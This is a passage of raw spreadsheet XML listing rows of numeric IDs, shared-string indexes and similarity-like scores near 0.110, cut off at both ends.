      <c r="C18222" s="2" t="s">
        <v>17566</v>
      </c>
      <c r="D18222" s="2">
        <v>1.0</v>
      </c>
      <c r="E18222" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18222" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18223" ht="15.75" customHeight="1">
      <c r="A18223" s="1">
        <v>16214.0</v>
      </c>
      <c r="B18223" s="2">
        <v>4.5707105E7</v>
      </c>
      <c r="C18223" s="2" t="s">
        <v>17567</v>
      </c>
      <c r="D18223" s="2">
        <v>1.0</v>
      </c>
      <c r="E18223" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18223" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18224" ht="15.75" customHeight="1">
      <c r="A18224" s="1">
        <v>16261.0</v>
      </c>
      <c r="B18224" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C18224" s="2" t="s">
        <v>17568</v>
      </c>
      <c r="D18224" s="2">
        <v>1.0</v>
      </c>
      <c r="E18224" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18224" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18225" ht="15.75" customHeight="1">
      <c r="A18225" s="1">
        <v>16411.0</v>
      </c>
      <c r="B18225" s="2">
        <v>4.6307112E7</v>
      </c>
      <c r="C18225" s="2" t="s">
        <v>17569</v>
      </c>
      <c r="D18225" s="2">
        <v>1.0</v>
      </c>
      <c r="E18225" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18225" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18226" ht="15.75" customHeight="1">
      <c r="A18226" s="1">
        <v>16749.0</v>
      </c>
      <c r="B18226" s="2">
        <v>4.758753E7</v>
      </c>
      <c r="C18226" s="2" t="s">
        <v>17570</v>
      </c>
      <c r="D18226" s="2">
        <v>1.0</v>
      </c>
      <c r="E18226" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18226" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18227" ht="15.75" customHeight="1">
      <c r="A18227" s="1">
        <v>17038.0</v>
      </c>
      <c r="B18227" s="2">
        <v>4.8510912E7</v>
      </c>
      <c r="C18227" s="2" t="s">
        <v>17571</v>
      </c>
      <c r="D18227" s="2">
        <v>1.0</v>
      </c>
      <c r="E18227" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18227" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18228" ht="15.75" customHeight="1">
      <c r="A18228" s="1">
        <v>17375.0</v>
      </c>
      <c r="B18228" s="2">
        <v>4.9510656E7</v>
      </c>
      <c r="C18228" s="2" t="s">
        <v>17572</v>
      </c>
      <c r="D18228" s="2">
        <v>1.0</v>
      </c>
      <c r="E18228" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18228" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18229" ht="15.75" customHeight="1">
      <c r="A18229" s="1">
        <v>17488.0</v>
      </c>
      <c r="B18229" s="2">
        <v>4.9953181E7</v>
      </c>
      <c r="C18229" s="2" t="s">
        <v>17573</v>
      </c>
      <c r="D18229" s="2">
        <v>1.0</v>
      </c>
      <c r="E18229" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18229" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18230" ht="15.75" customHeight="1">
      <c r="A18230" s="1">
        <v>18994.0</v>
      </c>
      <c r="B18230" s="2">
        <v>5.4429596E7</v>
      </c>
      <c r="C18230" s="2" t="s">
        <v>17574</v>
      </c>
      <c r="D18230" s="2">
        <v>1.0</v>
      </c>
      <c r="E18230" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18230" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18231" ht="15.75" customHeight="1">
      <c r="A18231" s="1">
        <v>19594.0</v>
      </c>
      <c r="B18231" s="2">
        <v>5.6172919E7</v>
      </c>
      <c r="C18231" s="2" t="s">
        <v>17575</v>
      </c>
      <c r="D18231" s="2">
        <v>1.0</v>
      </c>
      <c r="E18231" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18231" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18232" ht="15.75" customHeight="1">
      <c r="A18232" s="1">
        <v>19762.0</v>
      </c>
      <c r="B18232" s="2">
        <v>5.6735527E7</v>
      </c>
      <c r="C18232" s="2" t="s">
        <v>17576</v>
      </c>
      <c r="D18232" s="2">
        <v>1.0</v>
      </c>
      <c r="E18232" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18232" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18233" ht="15.75" customHeight="1">
      <c r="A18233" s="1">
        <v>20453.0</v>
      </c>
      <c r="B18233" s="2">
        <v>1.2527353E7</v>
      </c>
      <c r="C18233" s="2" t="s">
        <v>17577</v>
      </c>
      <c r="D18233" s="2">
        <v>1.0</v>
      </c>
      <c r="E18233" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18233" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18234" ht="15.75" customHeight="1">
      <c r="A18234" s="1">
        <v>20814.0</v>
      </c>
      <c r="B18234" s="2">
        <v>1.5332538E7</v>
      </c>
      <c r="C18234" s="2" t="s">
        <v>17578</v>
      </c>
      <c r="D18234" s="2">
        <v>1.0</v>
      </c>
      <c r="E18234" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18234" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18235" ht="15.75" customHeight="1">
      <c r="A18235" s="1">
        <v>21108.0</v>
      </c>
      <c r="B18235" s="2">
        <v>1.8185034E7</v>
      </c>
      <c r="C18235" s="2" t="s">
        <v>17579</v>
      </c>
      <c r="D18235" s="2">
        <v>1.0</v>
      </c>
      <c r="E18235" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18235" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18236" ht="15.75" customHeight="1">
      <c r="A18236" s="1">
        <v>21370.0</v>
      </c>
      <c r="B18236" s="2">
        <v>2.1574112E7</v>
      </c>
      <c r="C18236" s="2" t="s">
        <v>17580</v>
      </c>
      <c r="D18236" s="2">
        <v>1.0</v>
      </c>
      <c r="E18236" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18236" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18237" ht="15.75" customHeight="1">
      <c r="A18237" s="1">
        <v>21568.0</v>
      </c>
      <c r="B18237" s="2">
        <v>2.3776641E7</v>
      </c>
      <c r="C18237" s="2" t="s">
        <v>17581</v>
      </c>
      <c r="D18237" s="2">
        <v>1.0</v>
      </c>
      <c r="E18237" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18237" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18238" ht="15.75" customHeight="1">
      <c r="A18238" s="1">
        <v>22583.0</v>
      </c>
      <c r="B18238" s="2">
        <v>3.8940591E7</v>
      </c>
      <c r="C18238" s="2" t="s">
        <v>17582</v>
      </c>
      <c r="D18238" s="2">
        <v>1.0</v>
      </c>
      <c r="E18238" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18238" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18239" ht="15.75" customHeight="1">
      <c r="A18239" s="1">
        <v>22840.0</v>
      </c>
      <c r="B18239" s="2">
        <v>4.6619622E7</v>
      </c>
      <c r="C18239" s="2" t="s">
        <v>17583</v>
      </c>
      <c r="D18239" s="2">
        <v>1.0</v>
      </c>
      <c r="E18239" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18239" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18240" ht="15.75" customHeight="1">
      <c r="A18240" s="1">
        <v>22933.0</v>
      </c>
      <c r="B18240" s="2">
        <v>4.8694111E7</v>
      </c>
      <c r="C18240" s="2" t="s">
        <v>17584</v>
      </c>
      <c r="D18240" s="2">
        <v>1.0</v>
      </c>
      <c r="E18240" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18240" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18241" ht="15.75" customHeight="1">
      <c r="A18241" s="1">
        <v>22976.0</v>
      </c>
      <c r="B18241" s="2">
        <v>4926607.0</v>
      </c>
      <c r="C18241" s="2" t="s">
        <v>17585</v>
      </c>
      <c r="D18241" s="2">
        <v>1.0</v>
      </c>
      <c r="E18241" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18241" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18242" ht="15.75" customHeight="1">
      <c r="A18242" s="1">
        <v>22984.0</v>
      </c>
      <c r="B18242" s="2">
        <v>4931368.0</v>
      </c>
      <c r="C18242" s="2" t="s">
        <v>17586</v>
      </c>
      <c r="D18242" s="2">
        <v>1.0</v>
      </c>
      <c r="E18242" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18242" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18243" ht="15.75" customHeight="1">
      <c r="A18243" s="1">
        <v>23176.0</v>
      </c>
      <c r="B18243" s="2">
        <v>5214024.0</v>
      </c>
      <c r="C18243" s="2" t="s">
        <v>17587</v>
      </c>
      <c r="D18243" s="2">
        <v>1.0</v>
      </c>
      <c r="E18243" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18243" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18244" ht="15.75" customHeight="1">
      <c r="A18244" s="1">
        <v>23286.0</v>
      </c>
      <c r="B18244" s="2">
        <v>5.3759945E7</v>
      </c>
      <c r="C18244" s="2" t="s">
        <v>17588</v>
      </c>
      <c r="D18244" s="2">
        <v>1.0</v>
      </c>
      <c r="E18244" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18244" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18245" ht="15.75" customHeight="1">
      <c r="A18245" s="1">
        <v>23353.0</v>
      </c>
      <c r="B18245" s="2">
        <v>5488863.0</v>
      </c>
      <c r="C18245" s="2" t="s">
        <v>17589</v>
      </c>
      <c r="D18245" s="2">
        <v>1.0</v>
      </c>
      <c r="E18245" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18245" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18246" ht="15.75" customHeight="1">
      <c r="A18246" s="1">
        <v>23693.0</v>
      </c>
      <c r="B18246" s="2">
        <v>7065765.0</v>
      </c>
      <c r="C18246" s="2" t="s">
        <v>17590</v>
      </c>
      <c r="D18246" s="2">
        <v>1.0</v>
      </c>
      <c r="E18246" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18246" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18247" ht="15.75" customHeight="1">
      <c r="A18247" s="1">
        <v>24013.0</v>
      </c>
      <c r="B18247" s="2">
        <v>9301162.0</v>
      </c>
      <c r="C18247" s="2" t="s">
        <v>17591</v>
      </c>
      <c r="D18247" s="2">
        <v>1.0</v>
      </c>
      <c r="E18247" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18247" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18248" ht="15.75" customHeight="1">
      <c r="A18248" s="1">
        <v>24398.0</v>
      </c>
      <c r="B18248" s="2">
        <v>1.0790744E7</v>
      </c>
      <c r="C18248" s="2" t="s">
        <v>17307</v>
      </c>
      <c r="D18248" s="2">
        <v>1.0</v>
      </c>
      <c r="E18248" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18248" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18249" ht="15.75" customHeight="1">
      <c r="A18249" s="1">
        <v>24414.0</v>
      </c>
      <c r="B18249" s="2">
        <v>1.0826376E7</v>
      </c>
      <c r="C18249" s="2" t="s">
        <v>17592</v>
      </c>
      <c r="D18249" s="2">
        <v>1.0</v>
      </c>
      <c r="E18249" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18249" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18250" ht="15.75" customHeight="1">
      <c r="A18250" s="1">
        <v>25390.0</v>
      </c>
      <c r="B18250" s="2">
        <v>1.3691735E7</v>
      </c>
      <c r="C18250" s="2" t="s">
        <v>17593</v>
      </c>
      <c r="D18250" s="2">
        <v>1.0</v>
      </c>
      <c r="E18250" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18250" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18251" ht="15.75" customHeight="1">
      <c r="A18251" s="1">
        <v>25676.0</v>
      </c>
      <c r="B18251" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C18251" s="2" t="s">
        <v>17594</v>
      </c>
      <c r="D18251" s="2">
        <v>1.0</v>
      </c>
      <c r="E18251" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18251" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18252" ht="15.75" customHeight="1">
      <c r="A18252" s="1">
        <v>25736.0</v>
      </c>
      <c r="B18252" s="2">
        <v>1.4594622E7</v>
      </c>
      <c r="C18252" s="2" t="s">
        <v>17595</v>
      </c>
      <c r="D18252" s="2">
        <v>1.0</v>
      </c>
      <c r="E18252" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18252" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18253" ht="15.75" customHeight="1">
      <c r="A18253" s="1">
        <v>25761.0</v>
      </c>
      <c r="B18253" s="2">
        <v>1.4624992E7</v>
      </c>
      <c r="C18253" s="2" t="s">
        <v>17596</v>
      </c>
      <c r="D18253" s="2">
        <v>1.0</v>
      </c>
      <c r="E18253" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18253" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18254" ht="15.75" customHeight="1">
      <c r="A18254" s="1">
        <v>25873.0</v>
      </c>
      <c r="B18254" s="2">
        <v>1.4920324E7</v>
      </c>
      <c r="C18254" s="2" t="s">
        <v>17597</v>
      </c>
      <c r="D18254" s="2">
        <v>1.0</v>
      </c>
      <c r="E18254" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18254" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18255" ht="15.75" customHeight="1">
      <c r="A18255" s="1">
        <v>25995.0</v>
      </c>
      <c r="B18255" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C18255" s="2" t="s">
        <v>17578</v>
      </c>
      <c r="D18255" s="2">
        <v>1.0</v>
      </c>
      <c r="E18255" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18255" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18256" ht="15.75" customHeight="1">
      <c r="A18256" s="1">
        <v>26003.0</v>
      </c>
      <c r="B18256" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C18256" s="2" t="s">
        <v>17598</v>
      </c>
      <c r="D18256" s="2">
        <v>1.0</v>
      </c>
      <c r="E18256" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18256" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18257" ht="15.75" customHeight="1">
      <c r="A18257" s="1">
        <v>26693.0</v>
      </c>
      <c r="B18257" s="2">
        <v>1.8132693E7</v>
      </c>
      <c r="C18257" s="2" t="s">
        <v>17599</v>
      </c>
      <c r="D18257" s="2">
        <v>1.0</v>
      </c>
      <c r="E18257" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18257" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18258" ht="15.75" customHeight="1">
      <c r="A18258" s="1">
        <v>26704.0</v>
      </c>
      <c r="B18258" s="2">
        <v>1.8185033E7</v>
      </c>
      <c r="C18258" s="2" t="s">
        <v>17600</v>
      </c>
      <c r="D18258" s="2">
        <v>1.0</v>
      </c>
      <c r="E18258" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18258" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18259" ht="15.75" customHeight="1">
      <c r="A18259" s="1">
        <v>26841.0</v>
      </c>
      <c r="B18259" s="2">
        <v>1.8933571E7</v>
      </c>
      <c r="C18259" s="2" t="s">
        <v>17601</v>
      </c>
      <c r="D18259" s="2">
        <v>1.0</v>
      </c>
      <c r="E18259" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18259" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18260" ht="15.75" customHeight="1">
      <c r="A18260" s="1">
        <v>27599.0</v>
      </c>
      <c r="B18260" s="2">
        <v>2.2591706E7</v>
      </c>
      <c r="C18260" s="2" t="s">
        <v>17602</v>
      </c>
      <c r="D18260" s="2">
        <v>1.0</v>
      </c>
      <c r="E18260" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18260" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18261" ht="15.75" customHeight="1">
      <c r="A18261" s="1">
        <v>28305.0</v>
      </c>
      <c r="B18261" s="2">
        <v>2.5646798E7</v>
      </c>
      <c r="C18261" s="2" t="s">
        <v>17603</v>
      </c>
      <c r="D18261" s="2">
        <v>1.0</v>
      </c>
      <c r="E18261" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18261" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18262" ht="15.75" customHeight="1">
      <c r="A18262" s="1">
        <v>28480.0</v>
      </c>
      <c r="B18262" s="2">
        <v>2.6636948E7</v>
      </c>
      <c r="C18262" s="2" t="s">
        <v>17604</v>
      </c>
      <c r="D18262" s="2">
        <v>1.0</v>
      </c>
      <c r="E18262" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18262" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18263" ht="15.75" customHeight="1">
      <c r="A18263" s="1">
        <v>28762.0</v>
      </c>
      <c r="B18263" s="2">
        <v>2.8177591E7</v>
      </c>
      <c r="C18263" s="2" t="s">
        <v>17605</v>
      </c>
      <c r="D18263" s="2">
        <v>1.0</v>
      </c>
      <c r="E18263" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18263" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18264" ht="15.75" customHeight="1">
      <c r="A18264" s="1">
        <v>29190.0</v>
      </c>
      <c r="B18264" s="2">
        <v>3.07315E7</v>
      </c>
      <c r="C18264" s="2" t="s">
        <v>17606</v>
      </c>
      <c r="D18264" s="2">
        <v>1.0</v>
      </c>
      <c r="E18264" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18264" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18265" ht="15.75" customHeight="1">
      <c r="A18265" s="1">
        <v>29694.0</v>
      </c>
      <c r="B18265" s="2">
        <v>3.4254438E7</v>
      </c>
      <c r="C18265" s="2" t="s">
        <v>17607</v>
      </c>
      <c r="D18265" s="2">
        <v>1.0</v>
      </c>
      <c r="E18265" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18265" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18266" ht="15.75" customHeight="1">
      <c r="A18266" s="1">
        <v>29715.0</v>
      </c>
      <c r="B18266" s="2">
        <v>3.4401455E7</v>
      </c>
      <c r="C18266" s="2" t="s">
        <v>17608</v>
      </c>
      <c r="D18266" s="2">
        <v>1.0</v>
      </c>
      <c r="E18266" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18266" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18267" ht="15.75" customHeight="1">
      <c r="A18267" s="1">
        <v>30166.0</v>
      </c>
      <c r="B18267" s="2">
        <v>3.7072121E7</v>
      </c>
      <c r="C18267" s="2" t="s">
        <v>17609</v>
      </c>
      <c r="D18267" s="2">
        <v>1.0</v>
      </c>
      <c r="E18267" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18267" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18268" ht="15.75" customHeight="1">
      <c r="A18268" s="1">
        <v>30280.0</v>
      </c>
      <c r="B18268" s="2">
        <v>3.7728572E7</v>
      </c>
      <c r="C18268" s="2" t="s">
        <v>17610</v>
      </c>
      <c r="D18268" s="2">
        <v>1.0</v>
      </c>
      <c r="E18268" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18268" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18269" ht="15.75" customHeight="1">
      <c r="A18269" s="1">
        <v>30506.0</v>
      </c>
      <c r="B18269" s="2">
        <v>4.0038826E7</v>
      </c>
      <c r="C18269" s="2" t="s">
        <v>17611</v>
      </c>
      <c r="D18269" s="2">
        <v>1.0</v>
      </c>
      <c r="E18269" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18269" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18270" ht="15.75" customHeight="1">
      <c r="A18270" s="1">
        <v>30584.0</v>
      </c>
      <c r="B18270" s="2">
        <v>4118261.0</v>
      </c>
      <c r="C18270" s="2" t="s">
        <v>17612</v>
      </c>
      <c r="D18270" s="2">
        <v>1.0</v>
      </c>
      <c r="E18270" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18270" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18271" ht="15.75" customHeight="1">
      <c r="A18271" s="1">
        <v>30646.0</v>
      </c>
      <c r="B18271" s="2">
        <v>4174659.0</v>
      </c>
      <c r="C18271" s="2" t="s">
        <v>17613</v>
      </c>
      <c r="D18271" s="2">
        <v>1.0</v>
      </c>
      <c r="E18271" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18271" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18272" ht="15.75" customHeight="1">
      <c r="A18272" s="1">
        <v>30977.0</v>
      </c>
      <c r="B18272" s="2">
        <v>4.7524183E7</v>
      </c>
      <c r="C18272" s="2" t="s">
        <v>17614</v>
      </c>
      <c r="D18272" s="2">
        <v>1.0</v>
      </c>
      <c r="E18272" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18272" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18273" ht="15.75" customHeight="1">
      <c r="A18273" s="1">
        <v>31228.0</v>
      </c>
      <c r="B18273" s="2">
        <v>4926514.0</v>
      </c>
      <c r="C18273" s="2" t="s">
        <v>17615</v>
      </c>
      <c r="D18273" s="2">
        <v>1.0</v>
      </c>
      <c r="E18273" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18273" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18274" ht="15.75" customHeight="1">
      <c r="A18274" s="1">
        <v>31230.0</v>
      </c>
      <c r="B18274" s="2">
        <v>4926606.0</v>
      </c>
      <c r="C18274" s="2" t="s">
        <v>17616</v>
      </c>
      <c r="D18274" s="2">
        <v>1.0</v>
      </c>
      <c r="E18274" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18274" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18275" ht="15.75" customHeight="1">
      <c r="A18275" s="1">
        <v>31588.0</v>
      </c>
      <c r="B18275" s="2">
        <v>5128698.0</v>
      </c>
      <c r="C18275" s="2" t="s">
        <v>17617</v>
      </c>
      <c r="D18275" s="2">
        <v>1.0</v>
      </c>
      <c r="E18275" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18275" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18276" ht="15.75" customHeight="1">
      <c r="A18276" s="1">
        <v>31730.0</v>
      </c>
      <c r="B18276" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C18276" s="2" t="s">
        <v>17587</v>
      </c>
      <c r="D18276" s="2">
        <v>1.0</v>
      </c>
      <c r="E18276" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18276" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18277" ht="15.75" customHeight="1">
      <c r="A18277" s="1">
        <v>31736.0</v>
      </c>
      <c r="B18277" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C18277" s="2" t="s">
        <v>17618</v>
      </c>
      <c r="D18277" s="2">
        <v>1.0</v>
      </c>
      <c r="E18277" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18277" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18278" ht="15.75" customHeight="1">
      <c r="A18278" s="1">
        <v>31744.0</v>
      </c>
      <c r="B18278" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C18278" s="2" t="s">
        <v>17619</v>
      </c>
      <c r="D18278" s="2">
        <v>1.0</v>
      </c>
      <c r="E18278" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18278" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18279" ht="15.75" customHeight="1">
      <c r="A18279" s="1">
        <v>32450.0</v>
      </c>
      <c r="B18279" s="2">
        <v>5671041.0</v>
      </c>
      <c r="C18279" s="2" t="s">
        <v>17620</v>
      </c>
      <c r="D18279" s="2">
        <v>1.0</v>
      </c>
      <c r="E18279" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18279" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18280" ht="15.75" customHeight="1">
      <c r="A18280" s="1">
        <v>32506.0</v>
      </c>
      <c r="B18280" s="2">
        <v>5713783.0</v>
      </c>
      <c r="C18280" s="2" t="s">
        <v>17621</v>
      </c>
      <c r="D18280" s="2">
        <v>1.0</v>
      </c>
      <c r="E18280" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18280" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18281" ht="15.75" customHeight="1">
      <c r="A18281" s="1">
        <v>33008.0</v>
      </c>
      <c r="B18281" s="2">
        <v>6649178.0</v>
      </c>
      <c r="C18281" s="2" t="s">
        <v>17622</v>
      </c>
      <c r="D18281" s="2">
        <v>1.0</v>
      </c>
      <c r="E18281" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18281" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18282" ht="15.75" customHeight="1">
      <c r="A18282" s="1">
        <v>33788.0</v>
      </c>
      <c r="B18282" s="2">
        <v>8754165.0</v>
      </c>
      <c r="C18282" s="2" t="s">
        <v>17623</v>
      </c>
      <c r="D18282" s="2">
        <v>1.0</v>
      </c>
      <c r="E18282" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18282" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18283" ht="15.75" customHeight="1">
      <c r="A18283" s="1">
        <v>33792.0</v>
      </c>
      <c r="B18283" s="2">
        <v>8772880.0</v>
      </c>
      <c r="C18283" s="2" t="s">
        <v>17624</v>
      </c>
      <c r="D18283" s="2">
        <v>1.0</v>
      </c>
      <c r="E18283" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18283" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18284" ht="15.75" customHeight="1">
      <c r="A18284" s="1">
        <v>34061.0</v>
      </c>
      <c r="B18284" s="2">
        <v>9610078.0</v>
      </c>
      <c r="C18284" s="2" t="s">
        <v>17625</v>
      </c>
      <c r="D18284" s="2">
        <v>1.0</v>
      </c>
      <c r="E18284" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18284" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18285" ht="15.75" customHeight="1">
      <c r="A18285" s="1">
        <v>34129.0</v>
      </c>
      <c r="B18285" s="2">
        <v>9779015.0</v>
      </c>
      <c r="C18285" s="2" t="s">
        <v>17626</v>
      </c>
      <c r="D18285" s="2">
        <v>1.0</v>
      </c>
      <c r="E18285" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18285" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18286" ht="15.75" customHeight="1">
      <c r="A18286" s="1">
        <v>392.0</v>
      </c>
      <c r="B18286" s="2">
        <v>1.6513057E7</v>
      </c>
      <c r="C18286" s="2" t="s">
        <v>17627</v>
      </c>
      <c r="D18286" s="2">
        <v>1.0</v>
      </c>
      <c r="E18286" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18286" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18287" ht="15.75" customHeight="1">
      <c r="A18287" s="1">
        <v>3190.0</v>
      </c>
      <c r="B18287" s="2">
        <v>3.7198648E7</v>
      </c>
      <c r="C18287" s="2" t="s">
        <v>17628</v>
      </c>
      <c r="D18287" s="2">
        <v>1.0</v>
      </c>
      <c r="E18287" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18287" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18288" ht="15.75" customHeight="1">
      <c r="A18288" s="1">
        <v>13030.0</v>
      </c>
      <c r="B18288" s="2">
        <v>3294842.0</v>
      </c>
      <c r="C18288" s="2" t="s">
        <v>17629</v>
      </c>
      <c r="D18288" s="2">
        <v>1.0</v>
      </c>
      <c r="E18288" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18288" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18289" ht="15.75" customHeight="1">
      <c r="A18289" s="1">
        <v>14072.0</v>
      </c>
      <c r="B18289" s="2">
        <v>3.7651685E7</v>
      </c>
      <c r="C18289" s="2" t="s">
        <v>17630</v>
      </c>
